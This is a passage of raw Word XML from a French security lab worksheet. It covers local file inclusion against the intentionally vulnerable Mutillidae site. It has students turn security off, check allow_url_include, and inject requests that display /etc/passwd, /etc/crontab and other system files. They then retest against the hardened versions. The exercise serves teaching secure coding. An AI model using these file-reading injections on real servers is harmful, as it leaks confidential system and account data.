    <w:p w14:paraId="5D625902" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FD805D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38323312" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78DE17B9" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B40FA68" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D35EB2" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E49054" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C81D329" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B8EB46B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="__RefHeading___Toc5073_3014362717111"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>Maquette de travail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAC559F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Pour rappel, l’environnement de travail est le suivant :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5D8C33" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="11" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="08E1567C" wp14:editId="47BF7DAE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4991735" cy="1779905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1" name="Image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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4991735" cy="1779905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D87FC2" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A9F94A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CD4E1E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="573AC49E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0495B493" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3D1057" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A8C881" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7120A9BE" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1CD6A9" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2663D5F5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F13D332" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169A120A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB2BA30" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le serveur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> propose un site </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> conçu pour identifier et tester les failles de sécurité identifiées par l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:t>. Il est possible pour chacune d’entre elles, de définir le niveau de sécurité appliqué. Dans cette activité, la machine attaquante est une kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Marquedecommentaire"/>
          <w:rFonts w:eastAsia="Droid Sans Fallback" w:cs="Mangal"/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dans cette activité, BurpSuite n’est pas utilisé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769D91E2" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F29220" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Notre démarche consistera, pour les défis présentés :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC9564" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>à partir de la version non sécurisée de la page concernée et à mettre en évidence la faille de sécurité ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5BE6E8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nous constaterons ensuite que dans la version sécurisée de cette page fournie par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:r>
        <w:t>, l’attaque n’est plus possible ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B63A5B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>l’étude des mécanismes de sécurisation utilisés, donc du code de la page associée, permettra de dégager des bonnes pratiques de programmation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E99A5C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D3AB71" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Le premier défi est une injection locale et le second défi est une injection distante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A64D6BB" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498EA51E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="__RefHeading___Toc2903_1010401007"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t>Premier défi : Inclusion locale de fichiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006139EF" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre51"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="__RefHeading___Toc5077_30143627173"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t>Objectif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8249F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le premier défi a pour objectif d’afficher le contenu de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>plusieurs fichiers locaux au serveur cible. Ces fichiers contiennent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> des informations de configurations confidentielles. Ces informations pourraient être exploitées de manière malveillante. Les questions suivantes se traitent en utilisant le dossier documentaire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1B457" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:color w:val="0369A3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449047E5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre51"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="__RefHeading___Toc2360_19211572582"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t>À vous de jouer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E22F14F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injection locale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D904ABA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338F921F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Le but de cette première série de questions est de travailler sur des inclusions locales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E56CDB" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8DCCDF" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Commencer par démarrer les machines nécessaires puis positionner le niveau de sécurité de Mutillidae à 0 (Toggle security).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F97381" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D11CAA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Vérifier que le serveur web cible accepte les inclusions de fichiers (voir le positionnement à On de allow_url_include dans /etc/php/7.4/apache2/php.ini).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484588E3" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EA15238" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>À l’aide de vos recherches, expliquer le rôle des fichiers suivants présents sur le serveur web qui héberge Mutillidae :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDBFB71" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9074" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2609"/>
        <w:gridCol w:w="6465"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E2504F" w14:paraId="73EDDA1F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2609" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6666FF"/>
          </w:tcPr>
          <w:p w14:paraId="7B4A1ABA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>FICHIERS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6464" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6666FF"/>
          </w:tcPr>
          <w:p w14:paraId="64F05B5D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>EXPLICATIONS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="38EB7A86" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06D5C137" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6464" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51620876" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="740FE1B2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CC8307C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>/etc/resolv.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6464" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66F8DBA9" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="4C112DE5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20525ACF" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>/etc/crontab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6464" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12727578" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="57422612" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A1A97F6" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>/etc/sysctl.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6464" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7944962D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="5ED5FF6A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FBB65C5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>/etc/group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6464" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="733BF940" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52B46664" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC8DED8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>À l’aide du dossier documentaire n°1, réaliser les injections locales permettant d’afficher les fichiers de la question Q3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A0079" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56911379" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nouvelle tentative en mode sécurisé et analyse du code source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4E9EB" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FAE917F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Le but de cette deuxième partie est de tester à nouveau l’attaque après activation du codage sécurisé et de comprendre l’encodage mis en place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771086A8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="500ACCD9" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Test du niveau 1 de sécurité :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49617760" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2D6FD9" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Est-ce que le niveau de sécurité 1 permet d’éviter cette brèche de sécurité ? Pourquoi ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5928A6BB" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0791380B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000066"/>
        </w:rPr>
        <w:t>Test du niveau 5 de sécurité :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691FA4E2" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
